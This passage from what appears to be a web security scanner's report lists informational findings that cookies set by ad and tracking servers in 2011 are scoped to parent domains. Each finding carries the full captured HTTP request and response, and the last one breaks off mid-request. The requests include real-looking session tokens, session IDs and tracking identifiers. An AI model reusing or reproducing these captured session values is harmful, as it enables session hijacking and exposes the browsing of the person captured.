8.69. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNTA1MTgzMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=uQqyN5pqCIxFGqrovMg3sY4XSKMCItdxygQ3WXsMIsY4FLDCA9qxygAZhXsMI0eDGLDCw3gxygw7NYsMIMa4FLDCbGexygg2kXsMIsjmGLDC6ijxygAmhXsMIAY4FLDCdDmxyggihXsMIgJaGLDCcbpxygAhhXsMIca4FLDCEHoxygwoyasMIoa4FLDC4Goxygw2kXsMIYnXGLDCWGoxygwKOasM1q6AaMrhfV7qDEysGtYkBMAoNXAtmZOiGgasjMAbUa8iNSPC73cBwtIuDUAsFyrZrgqRmCrnD8ekGrcl0Pw6iaIvTC1A0kdxKzq7DEwcGrMtyNw2sasypewAP7lxKDKYE8KIGA1sVTAJqaonj+OBXTjhWHJwFsb0F8rr5XAhTaI7zCVBLRqh3jq/FEqXG3/nDbAIcYUJ1+vBVSrBDSW60awuhahBdPiB5GKvGcuKGrLmOYALjYEmGw5oGhpBxbfRYmqRHU/XGbUh4W2gLYwkxSyBvRph3OrdHAPpGL+s3cQ7jaw4z2CCCPqhjA; F1=BEGpK3kAAAAAz04CAEAAgEgAAAAAVK6CAEAAgEgAAAAA6N/CAEAAgEABAAAABAAAAYAASEA; BASE=Rgwq5yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2ufXu4QL44U5Tp5J7h57WACK9D9olo7ZgEU+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zA+A9p1kL5hoC+WRIusIIHq0xcWEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QshLve3uV6nucXOOzq0kGDGuxO!; ROLL=boAnv2Cov1BglnGDmmmzcgHSg94V6NBUl5QpXT083Kaw4lx9LehaUKI!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.755601.0XMC
Set-Cookie: C2=tE+yN5pqCIxFGcnovMg3sYAHSK8BItdRvfQ3WX07HsY4F9+BA9qRvfAZhX07H0eDG9+Bw3gRvfw7NY07HMa4F9+BbGeRvfg2kX07HsjmG9+B6ijRvfAmhX07HAY4F9+BdDmRvfgihX07HgJaG9+BcbpRvfAhhX07Hca4F9+BEHoRvfwoya07Hoa4F9+B4GoRvfw2kX07HYnXG9+BWGoRvfwKOa071q6AaMrBcU7qDEysGfUkBMAoNXIcmZOiGgasjMAbUaESNSPC73cBwtIuDUAsFknZrgqxiBrnD8ekGdYl0Pw6iaQeTC1A0kdRHyq7DEwcGdItyNw2sa0hpewAP7lRHCKYE8KIGywsVTAJqawWj+OBXTjBTGJwFsb0Funr5XAhTaQqzCVBLRqB0iq/FEqXGp7nDXAIcYc41+vBVSrh/QW60a4dhahBdPih1FKvGcuKGdHmOYALjYMVGw5oGTlBxbfxUlqRHU/XGNQh4W2gLY4TxSyBvRpB0NrdHAPpG95s3cQ7ja4nz2yBCPqBgD; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: F1=B0S4L3EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: BASE=Rgwq5yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uHXu4QL44U5Tp5J7h57WACK9D9olo7ZgEU+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zA+A9p1kL5hoC+WRIusIIHq0xcWEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QshLve3uV6nucXOOzq0kGDGuxO!; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: ROLL=boAno2C+ORAg3QH!; domain=advertising.com; expires=Sat, 11-May-2013 13:31:25 GMT; path=/
Set-Cookie: 1468728=_4dcbe12d,6658486637,755601^894875^1^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 12 May 2011 13:31:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000755601/mnum=0000894
...[SNIP]...
8.70. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /e/cm?t=oruf-20&o=1&p=9&l=sb3&pvid=062B51BD8CA550D9&ref-url=http%3A//orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html&ref-title=The%20Orange%20Orb%3A%20Planets%20Align%20on%20Friday%20the%2013th%2C%20AND...&ref-ref=&bgc=FFFFFF&bdc=C80109&pcc=990000&tec=000000&tic=DC1D25&ac=FFFFFF&pvc=6E6E6E&mp=1&hl=1&dsc=1&title=82,101,103,97,110,32,76,101,101,39,115,32,83,116,111,114,101,32,111,110,32,65,109,97,122,111,110,46,99,111,109,33&f=ifr&e=utf-8 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lc-main=en_US; s_pers=%20s_ev15%3D%255B%255B%2527Typed/Bookmarked%2527%252C%25271303907323249%2527%255D%252C%255B%2527Typed/Bookmarked%2527%252C%25271303911653101%2527%255D%252C%255B%2527www.webstoresellmore.com%2527%252C%25271303919819108%2527%255D%255D%7C1461772619108%3B%20s_dl%3D1%7C1303921676354%3B%20gpv_page%3DUS%253AWS%253APricing-Options%253APricing-Options%7C1303921676363%3B; _mkto_trk=id:810-GRW-452&token:_mch-amazon.com-1303907323369-39830; session-token=45h19hdOPPJ6wOOfLpRhuZ5a+tHbJN0Yn1Pz8Mt9SC8iEu30sQidjghp+yiRcg/lJEw2MQjNsYBTvrnFumfZbugF8QO2HHy6dOzlE94Gg05TyeLIRgBJLrI+NTqi0wO2wJ403GqaJfi7BSth5OxeeVFJ5+daAcNcUOZouvxnpaoJRaKE8bf5vC00RyndOSQu2HP0E3/TBVDD9LtynyiLetGL0vfAM8K9mCUTAxjCXQMh0pHaCNNAFi5s78XmwXgR; __utma=194891197.750670333.1304243790.1304243790.1304243790.1; __utmz=194891197.1304243790.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ubid-main=177-8019787-9467434; session-id-time=2082787201l; session-id=175-8214368-0288160; apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:18 GMT
Server: Server
Set-Cookie: apn-user-id=a9998262-6685-4eee-85f3-cb8592198aeb; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 3949
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
8.71. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:11 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:32:58 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:32:58 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Set-Cookie: _curtime=1305207178; domain=pubmatic.com; expires=Thu, 12-May-2011 14:42:58 GMT; path=/
Set-Cookie: pubfreq_25277_19976_856941671=243-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:12:58 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:32:58 GMT; path=/
Content-Length: 1486

document.writeln('<'+'script type="text/javascript" src="http://ad.media6degrees.com/adserv/cs?tId=9932717481735209|cb=1305207191|adType=ad|cId=6524|ec=1|spId=32750|advId=1065|exId=22|price=3.0000|pub
...[SNIP]...
8.72. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.examiner.com
Path:   /b/ss/examinercom/1/H.21/s24557034953031

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/examinercom/1/H.21/s24557034953031?AQB=1&ndh=1&t=12/4/2011%208%3A30%3A37%204%20300&ce=ISO-8859-1&ns=examinercom&pageName=Examiner%20Article&g=http%3A//www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&cc=USD&ch=Sports&server=192.168.1.55&events=event4%2Cevent15%2Cevent5&c1=Fight%20Sports&h1=National%3ASports%3AFight%20Sports%3AFight%20Sports&c4=ARTICLE%20EXENTRY%3A33045071&v4=ARTICLE%20EXENTRY%3A33045071&c5=Complete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20%27face%27%20and%20new%20feuds&v5=National&c6=Rick%20Rockwell&v6=National&c7=EXID%3A21442%20Fight%20Sports%20Examiner&c8=EXID%3A21442&c9=11&c10=National&c11=National&v11=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c12=story&c13=y2011m05d11&c14=Fight%20Sports&v16=7%3A00AM&c17=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&v17=Thursday&c18=7%3A00AM&v18=Weekday&c19=Thursday&c20=Weekday&c21=First%20Visit&c22=Fight%20Sports%20Examiner&c23=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c24=1501231&c25=National&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: stats.examiner.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXAMINEREDITION=921; __utmz=109783377.1305207036.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109783377.2080855934.1305207036.1305207036.1305207036.1; __utmc=109783377; __utmb=109783377.1.10.1305207036; s_cc=true; s_visit=1; s_lv=1305207037528; s_lv_s=First%20Visit; s_dlv=First%20Visit

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5F0A8051D189A-40000126E0002357[CE]; Expires=Tue, 10 May 2016 13:32:00 GMT; Domain=.examiner.com; Path=/
Location: http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031?AQB=1&pccr=true&vidn=26E5F0A8051D189A-40000126E0002357&&ndh=1&t=12/4/2011%208%3A30%3A37%204%20300&ce=ISO-8859-1&ns=examinercom&pageName=Examiner%20Article&g=http%3A//www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&cc=USD&ch=Sports&server=192.168.1.55&events=event4%2Cevent15%2Cevent5&c1=Fight%20Sports&h1=National%3ASports%3AFight%20Sports%3AFight%20Sports&c4=ARTICLE%20EXENTRY%3A33045071&v4=ARTICLE%20EXENTRY%3A33045071&c5=Complete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20%27face%27%20and%20new%20feuds&v5=National&c6=Rick%20Rockwell&v6=National&c7=EXID%3A21442%20Fight%20Sports%20Examiner&c8=EXID%3A21442&c9=11&c10=National&c11=National&v11=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c12=story&c13=y2011m05d11&c14=Fight%20Sports&v16=7%3A00AM&c17=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&v17=Thursday&c18=7%3A00AM&v18=Weekday&c19=Thursday&c20=Weekday&c21=First%20Visit&c22=Fight%20Sports%20Examiner&c23=National%3ASports%3AFight%20Sports%3Acomplete%20wwe%20smackdown%20spoilers%20for%20friday%20may%2013th%2C%20new%20%27face%27%20and%20new%20feuds&c24=1501231&c25=National&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 13:32:00 GMT
Last-Modified: Fri, 13 May 2011 13:32:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www255
Content-Length: 0
Content-Type: text/plain

8.73. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=4&mt_ec=64ws&mt_exuid=CAESEI7AtohZAB1uVQGOsNXUkdI&cver=1 HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTWpsRk5ETkVPRVl0TlRKRE5TMDBRemRDTFVJeVJVRXRNREU0TVRRNU5rVTJOamN4L05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NDAwNDk4MTEwMzk2MTYzNS8xMTUwMDMvMTAwNDcwLzMvUTNBbV9DbnBmUVVnTncyOVZSNGhUbWpqa0w0WkZVdDFnbUFFWWRJanE0RS8/HmZsFV1ZVDb6VABVBJjTE0kobiw&price=3.5500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305129714; mt_mop=4:1305207080
If-None-Match: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x2217 8727
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 12 May 2011 13:34:01 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1305207241; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:34:01 GMT
Set-Cookie: mt_mop=4:1305207241; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:34:01 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
8.74. http://t.invitemedia.com/track_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /track_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_imp?auctionID=13052070721588565-93912&pubICode=2083508&ckieName=33x_ps&crID=93912&campID=90206&cost=3.2143&partnerID=38&pub=369335&partner_uid=u%253D7527692047%253As1%253D1303122295815%253Ats%253D1305126977891%253As2.33%253D%252C8131%252C4401%252C2751%252C8801%252C8261%252C6571%252C3831%252C7051%252C7651%252C6561%252C7661%252C2740%252C4411%252C9221%252C7671%252C9241%252C8151%252C5481%252C9232%252C571%252C6581%252C8282%252C8771%252C7621%252C8291%252C6531%252C8301%252C8171%252C2231%252C8781%252C4381%252C3321%252C7101%252C8311%252C8791%252C5451%252C8181%252C4911%252C7641%252C5441%252C2811%252C3761%252C7591%252C5911%252C2801%252C4472%252C7111%252C3771%252C5431%252C7131%252C1051%252C3202%252C5421%252C4451%252C6651%252C4461%252C5411%252C7121%252C8761%252C2791%252C5891%252C6641%252C4941%252C8101%252C8711%252C581%252C8231%252C3741%252C5941%252C7561%252C8111%252C7141%252C4441%252C1061%252C591%252C7161%252C2761%252C8241%252C6621%252C4421%252C5391%252C8721%252C4431%252C601%252C3241%252C5921%252C3721%252C8121%252C7581%252C5381%252C5021%252C3161%252C3711%252C7531%252C8391%252C8001%252C5012%252C7521%252C6111%252C5601%252C6931%252C7541%252C6091%252C6941%252C6461%252C8041%252C5591%252C6951%252C6131%252C8431%252C5051%252C3192%252C6411%252C8421%252C4501%252C6961%252C8061%252C4492%252C6421%252C6121%252C7511%252C4481%252C5581%252C8051%252C3171%252C6431%252C2571%252C6971%252C8331%252C6501%252C5552%252C5081%252C201%252C6981%252C2141%252C8871%252C8321%252C6511%252C6991%252C7461%252C4592%252C6041%252C5071%252C7961%252C4581%252C7001%252C8881%252C8341%252C5061%252C6471%252C7011%252C6071%252C231%252C2651%252C5111%252C7971%252C6051%252C7031%252C6481%252C5512%252C7991%252C6491%252C8851%252C6331%252C7891%252C2441%252C3521%252C4071%252C2981%252C8541%252C6321%252C5221%252C9081%252C7901%252C3541%252C8512%252C2461%252C9061%252C7881%252C3551%252C6791%252C2452%252C8522%252C7381%252C7921%252C4101%252C5192%252C6841%252C5731%252C7931%252C2951%252C9051%252C6291%252C7391%252C3561%252C8551%252C4051%252C6281%252C2491%252C2971%252C7361%252C5211%252C3571%252C4671%252C2481%252C3581%252C7373%252C4062%252C5751%252C2961%252C7831%252C341%252C7351%252C9011%252C8471%252C4681%252C6391%252C9021%252C2501%252C4691%252C6862%252C3071%252C5181%252C7811%252C5171%252C7821%252C3481%252C4031%252C6851%252C6371%252C7341%252C9001%252C3491%252C7861%252C5131%252C6361%252C4711%252C8501%252C7321%252C5121%252C7871%252C8991%252C3501%252C6901%252C8481%252C4721%252C7301%252C7841%252C5151%252C3511%252C5682%252C361%252C7851%252C5141%252C8971%252C5351%252C8671%252C7771%252C4751%252C2311%252C7291%252C4271%252C9212%252C2851%252C5831%252C9202%252C8661%252C4741%252C951%252C6201%252C7281%252C6661%252C4281%252C2871%252C5842%252C4761%252C6181%252C5361%252C8641%252C6191%252C7751%252C7261%252C6711%252C8701%252C5861%252C921%252C7792%252C6171%252C9171%252C5871%252C3911%252C5321%252C4771%252C8691%252C7251%252C9161%252C5332%252C4251%252C6691%252C8682%252C6151%252C431%252C4791%252C6701%252C5881%252C421%252C7781%252C2841%252C9151%252C8601%252C7711%252C3881%252C3341%252C4801%252C7701%252C5771%252C7221%252C5781%252C4351%252C6721%252C9131%252C2932%252C6241%252C7691%252C8591%252C4341%252C5791%252C2941%252C5311%252C7681%252C3351%252C451%252C9122%252C6732%252C3891%252C6771%252C5251%252C3851%252C3362%252C9111%252C6232%252C5261%252C8631%252C5801%252C3841%252C7191%252C971%252C3871%252C9101%252C5811%252C7181%252C2901%252C5271%252C6211%252C7721%252C3390%252C7171%252C961%252C4311%252C6761%252C5821%252C3861%252C9091%252C&url=http%3A%2F%2Fadserving2.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D300x250%26section%3D1588565 HTTP/1.1
Host: t.invitemedia.com
Proxy-Connection: keep-alive
